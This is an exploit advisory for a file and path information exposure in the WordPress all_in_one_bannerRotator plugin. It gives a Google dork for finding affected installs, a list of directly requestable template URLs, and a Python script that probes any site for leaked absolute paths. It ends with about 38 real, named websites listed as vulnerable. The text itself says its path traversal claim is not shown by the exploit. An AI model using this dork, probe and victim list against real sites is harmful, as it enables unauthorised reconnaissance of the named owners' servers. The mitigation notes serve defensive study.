WordPress all_in_one_bannerRotator Plugins 4.9.9 File Information Exposure

Author: KingSkrupellos , Published: 18-01-2019
###############################################################################

# Exploit Title : WordPress all_in_one_bannerRotator Plugins 4.9.9 File Information Exposure
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 14/01/2019
# Vendor Homepage : lambertgroupproductions.com ~ responsivejqueryslider.com
# Software Download Link : downloads.wordpress.org/plugin/all-in-one-slider.zip
# Software Information Links : responsivejqueryslider.com/banner_rotator.html
+ responsivejqueryslider.com/wordpressplugin/banner_rotator_responsive.html
+ codecanyon.net/item/all-in-one-slider-responsive-jquery-slider-plugin/1534434?ref=LambertGroup
+ lambertgroupproductions.com/portfolio_page/one-slider-responsive-jquery-slider-plugin/
# Software Price : 11$
# Tested On : Windows and Linux
# Category : WebApps
# Affected Versions : 1.1 - 3.0 - 3.2 - 3.5.0 - 4.7.12 - 4.9.9
# Exploit Risk : High
# Google Dorks : inurl:"/wp-content/plugins/all_in_one_bannerRotator/"
# Vulnerability Type : CWE-200 [ Information Exposure ]
+ CWE-538 [ File and Directory Information Exposure ]
+ CWE-22 [ Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') ]

###############################################################################

# Impact :
***********

* The WordPress all_in_one_bannerRotator plugin 4.9.9 (and the other versions listed above) is prone to a
file information exposure: the plugin's admin template files under /tpl/ are served on direct request,
outside the WordPress admin screens. Because the web server hands such a request straight to PHP, none of
WordPress's capability checks apply and the template runs without the environment it expects.

* What the attacker learns depends on the server's PHP error settings. A template loaded this way commonly
references WordPress functions and variables that are not defined, and with display_errors enabled the
resulting warnings or fatal error embed the absolute filesystem path of the script (full path disclosure:
web root, plugin install location, hosting layout). That information aids further attacks that need a
known absolute path, which is the reason for the High risk rating.

* The author additionally classifies the issue as arbitrary file disclosure / path traversal (CWE-22).
Note that the Exploit section below shows only direct requests to the template files and no traversal
parameter, so verify the traversal claim against the plugin source before reporting it as such.

* CWE-200: an information exposure is the intentional or unintentional disclosure of information to an
actor that is not explicitly authorized to have access to that information.

* CWE-538: the product stores sensitive information in files or directories that are accessible to actors
outside of the intended control sphere.

* CWE-22: the software uses external input to construct a pathname that is intended to identify a file or
directory located underneath a restricted parent directory, but does not properly neutralize special
elements within the pathname that can cause it to resolve to a location outside of the restricted directory.

* Mitigation: deny direct web access to the plugin's tpl/ directory at the web server, keep display_errors
off in production, and guard each template so that it exits when WordPress's ABSPATH constant is not
defined (the usual WordPress direct-access guard).

###############################################################################

# Video Tutorials =>
*******************

Step 1: Installation – youtube.com/watch?v=D8rQdXzEz0o
Step 2: Manage Images – youtube.com/watch?v=ULrPCuP0rnQ
Step 3: Manage Text Over Image – youtube.com/watch?v=4KqgWBmx8RA
Step 4: Manage Multiple Banners – youtube.com/watch?v=y2wnD3hUdus

###############################################################################

# Exploit :
*************

/wp-content/plugins/all_in_one_bannerRotator/tpl/add_banner.php

/wp-content/plugins/all_in_one_bannerRotator/tpl/add_banner.php?page=all_in_one_bannerRotator_Manage_Banners

/wp-content/plugins/all_in_one_bannerRotator/tpl/add_playlist_record.php

/wp-content/plugins/all_in_one_bannerRotator/tpl/banners.php

/wp-content/plugins/all_in_one_bannerRotator/tpl/help.php

/wp-content/plugins/all_in_one_bannerRotator/tpl/overview.php

/wp-content/plugins/all_in_one_bannerRotator/tpl/overview.php?page=all_in_one_bannerRotator_Add_New

/wp-content/plugins/all_in_one_bannerRotator/tpl/overview.php?page=all_in_one_bannerRotator_Manage_Banners

/wp-content/plugins/all_in_one_bannerRotator/tpl/overview.php?page=all_in_one_bannerRotator_Help

/wp-content/plugins/all_in_one_bannerRotator/tpl/playlist.php

/wp-content/plugins/all_in_one_bannerRotator/tpl/add_playlist_record.php?page=all_in_one_bannerRotator_Playlist

/wp-content/plugins/all_in_one_bannerRotator/tpl/playlist_elements_over_image.php

/wp-content/plugins/all_in_one_bannerRotator/tpl/preview.html

/wp-content/plugins/all_in_one_bannerRotator/tpl/settings_form.php
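
The following checker is an added example and is not part of the advisory or of the plugin. It requests each
template path listed above under a site base URL and flags responses that carry a PHP diagnostic with an
absolute script path, which is the full path disclosure a directly loaded template usually produces. The
diagnostic pattern is an assumption about standard PHP error output, not something confirmed by this page;
the base URL http://example.test and the sample responses are constructed for an offline dry run, and the
fetch function is injectable so the classification logic runs without network access.

```python
import re
import sys
import urllib.error
import urllib.request
from typing import Callable, Dict, List, Tuple

# Admin template files listed in the advisory, relative to the WordPress root.
PLUGIN_DIR = "/wp-content/plugins/all_in_one_bannerRotator/tpl/"
TEMPLATE_FILES = [
    "add_banner.php",
    "add_playlist_record.php",
    "banners.php",
    "help.php",
    "overview.php",
    "playlist.php",
    "playlist_elements_over_image.php",
    "preview.html",
    "settings_form.php",
]

# Assumption: a template loaded outside WordPress emits PHP diagnostics in the
# standard "<level>: <message> in <file> on line <n>" format, <file> being absolute
# (Unix "/..." or Windows "C:\..."). Anything matching is treated as a path leak.
PHP_DIAG_RE = re.compile(
    r"(?:Warning|Fatal error|Notice|Deprecated|Parse error):\s+(?P<msg>.*?)\s+in\s+"
    r"(?P<path>(?:[A-Za-z]:\\|/)\S+?\.php)\s+on\s+line\s+(?P<line>\d+)"
)


def build_urls(base: str) -> List[str]:
    """Join a site base URL (scheme + host, optional sub-path) with every template path."""
    return [base.rstrip("/") + PLUGIN_DIR + name for name in TEMPLATE_FILES]


def classify(status: int, body: str) -> Dict[str, object]:
    """Report whether the file answered 200 and which absolute paths its body leaks."""
    leaked = sorted({m.group("path") for m in PHP_DIAG_RE.finditer(body)})
    return {
        "reachable": status == 200,
        "leaked_paths": leaked,
        "disclosure": bool(leaked),  # a 500 with a fatal error still leaks the path
    }


def http_fetch(url: str, timeout: float = 10.0) -> Tuple[int, str]:
    """Plain stdlib fetch that returns the body of error responses too."""
    req = urllib.request.Request(url, headers={"User-Agent": "tpl-exposure-check/1.0"})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status, resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as e:
        return e.code, e.read().decode("utf-8", "replace")


def probe(base: str, fetch: Callable[[str], Tuple[int, str]] = http_fetch) -> Dict[str, Dict[str, object]]:
    """Probe every template URL under `base`; `fetch` is injectable so the logic can run offline."""
    return {url: classify(*fetch(url)) for url in build_urls(base)}


# Constructed sample responses (not captured from any real site) for the offline dry run.
SAMPLE_RESPONSES = {
    "add_banner.php": (200, "Warning: Undefined variable $wpdb in "
                            "/var/www/html/wp-content/plugins/all_in_one_bannerRotator/tpl/add_banner.php"
                            " on line 12"),
    "help.php": (403, "Forbidden"),
    "preview.html": (200, "<html><body>preview</body></html>"),
}


def sample_fetch(url: str) -> Tuple[int, str]:
    """Offline stand-in for http_fetch keyed on the file name."""
    return SAMPLE_RESPONSES.get(url.rsplit("/", 1)[-1], (404, "Not Found"))


if __name__ == "__main__":
    # With a base URL argument the real fetcher is used; without one the constructed samples are.
    base = sys.argv[1] if len(sys.argv) > 1 else "http://example.test"
    fetch = http_fetch if len(sys.argv) > 1 else sample_fetch
    for url, r in probe(base, fetch).items():
        flag = "LEAK" if r["disclosure"] else ("open" if r["reachable"] else "-")
        print(f"{flag:5} {url} {r['leaked_paths']}")
```

Run it with `python3 check.py https://target.example` against a site you are authorized to test; a `LEAK`
line means the template answered with a diagnostic that exposes its absolute path, an `open` line means the
file is served directly but the body showed no diagnostic (display_errors may simply be off), and a `-`
means the server refused or did not have the file.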

###############################################################################

# Example Vulnerable Sites :
****************************

[+] amf-lebanon.com/wp-content/plugins/all_in_one_bannerRotator/tpl/add_playlist_record.php

[+] hotel-le-verseau.com/wp-content/plugins/all_in_one_bannerRotator/tpl/add_banner.php

[+] wolfetours.com/wp-content/plugins/all_in_one_bannerRotator/tpl/add_banner.php

[+] sklawfirm.com/wp-content/plugins/all_in_one_bannerRotator/tpl/add_banner.php

[+] ecolestetiennedeseaux.fr/wp-content/plugins/all_in_one_bannerRotator/tpl/add_banner.php

[+] warrentonfamilydentistry.com/wp-content/plugins/all_in_one_bannerRotator/tpl/add_banner.php

[+] icaran.cl/headhunters/wp-content/plugins/all_in_one_bannerRotator/tpl/add_banner.php

[+] oha.net.au/wp-content/plugins/all_in_one_bannerRotator/tpl/add_banner.php

[+] neostrata.ie/wp-content/plugins/all_in_one_bannerRotator/tpl/add_banner.php

[+] dash.gr/wp-content/plugins/all_in_one_bannerRotator/tpl/add_banner.php

[+] mydebtadvisors.com/dev/wp-content/plugins/all_in_one_bannerRotator/tpl/add_banner.php

[+] downtoearthlawn.com/wp-content/plugins/all_in_one_bannerRotator/tpl/add_banner.php

[+] marketingdepartmentinc.com/wp-content/plugins/all_in_one_bannerRotator/tpl/add_banner.php

[+] veepraces.com/wp-content/plugins/all_in_one_bannerRotator/tpl/add_banner.php

[+] mvucc.com/wp-content/plugins/all_in_one_bannerRotator/tpl/add_banner.php

[+] thebutlerschool.com/wp-content/plugins/all_in_one_bannerRotator/tpl/add_banner.php

[+] mckannafabs.com.au/wp-content/plugins/all_in_one_bannerRotator/tpl/add_banner.php

[+] susanelanjones.co.uk/wp-content/plugins/all_in_one_bannerRotator/tpl/add_banner.php

[+] animalrepro.com/wp-content/plugins/all_in_one_bannerRotator//tpl/add_banner.php

[+] carh.org/wp-content/plugins/all_in_one_bannerRotator/tpl/add_banner.php

[+] orsrents.com/wp-content/plugins/all_in_one_bannerRotator/tpl/add_banner.php

[+] trechomes.com/wp-content/plugins/all_in_one_bannerRotator/tpl/add_banner.php

[+] primepowdercoating.com.au/wp-content/plugins/all_in_one_bannerRotator/tpl/add_banner.php

[+] baystateconsultants.com/wp-content/plugins/all_in_one_bannerRotator/tpl/add_banner.php

[+] cardiff-lift.co.uk/wp-content/plugins/all_in_one_bannerRotator/tpl/add_banner.php

[+] triplesservices.com/wp-content/plugins/all_in_one_bannerRotator/tpl/add_banner.php

[+] homeleisure.com.au/wp-content/plugins/all_in_one_bannerRotator/tpl/add_banner.php

[+] perryverroneroofing.com/wp-content/plugins/all_in_one_bannerRotator/tpl/add_banner.php

[+] emmaswebsite.com.au/esh/wp-content/plugins/all_in_one_bannerRotator/tpl/add_banner.php

[+] viatorians.com/wp-content/plugins/all_in_one_bannerRotator/tpl/add_banner.php

[+] avantec.se/wp-content/plugins/all_in_one_bannerRotator/tpl/add_banner.php

[+] bodycorpservices.co.nz/wp-content/plugins/all_in_one_bannerRotator/tpl/add_banner.php

[+] ultrafin.co.za/wp-content/plugins/all_in_one_bannerRotator/tpl/add_banner.php

[+] smartindia.co.in/influx/wp-content/plugins/all_in_one_bannerRotator/tpl/add_banner.php

[+] lejagroup.com/wp-content/plugins/all_in_one_bannerRotator/tpl/add_banner.php

[+] vibrantjersey.je/wp-content/plugins/all_in_one_bannerRotator/tpl/add_banner.php

[+] casadovelhodragoeiro.com/wp-content/plugins/all_in_one_bannerRotator/tpl/add_banner.php

[+] pegasostravel.com/wp-content/plugins/all_in_one_bannerRotator/tpl/add_banner.php

###############################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

#################################################################################################